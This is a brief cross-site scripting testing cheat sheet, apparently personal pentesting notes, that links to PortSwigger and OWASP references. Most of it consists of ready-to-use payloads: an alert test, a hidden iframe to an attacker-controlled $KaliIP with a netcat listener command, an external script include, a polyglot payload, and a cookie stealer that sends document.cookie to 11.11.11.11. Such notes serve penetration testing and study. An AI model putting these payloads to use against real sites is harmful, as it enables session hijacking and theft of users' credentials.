XXS manual testing
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
#Special characters that indicate the possibility of XXS
< > ' " { } ;
hello“;<>
Try:
<script>alert('XSS')</script> #careful with single quotes font
#Content injection : redirecting user to malicious content
Embed an iframe within html code:
<iframe src=http://$KaliIP:80/report height='0' width='0'></iframe>
#netcat listener on port 80
nc -nvlp 80
#Submit the XXS payload through some login form / blog / query tab
#Shell
#Steal PHP session ID
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
#Polyglot XXS payload
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
#Cookie stealer
<script>new Image().src="http://11.11.11.11/cool.jpg?output="+document.cookie;</script>
Last updated